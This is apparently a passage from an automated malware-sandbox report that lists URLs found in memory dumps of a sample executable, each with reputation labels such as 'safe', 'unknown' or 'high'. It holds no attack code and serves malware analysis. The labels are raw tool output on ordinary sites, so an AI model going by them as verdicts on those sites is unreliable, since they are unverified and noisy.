PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.pwd.org/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.602486306.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?verPIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://wwwomes.edu.pl/PIyT9A3jfC.exe, 00000001.00000002.894106313.00000000076CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizzaPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://www.elpro.si/avtorji/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.elpro.si/wp-content/plugins/sitepreYPIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?verPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-100x100.jpgpigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130104085305_100_0645_105x0-aspect-wr.JPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=MediterranPIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://pohlfood.com/comments/feed/PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://www.com-sit.com/testhouse/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerjiPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-monipigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.cssPIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://www.aevga.com/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.591607281.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 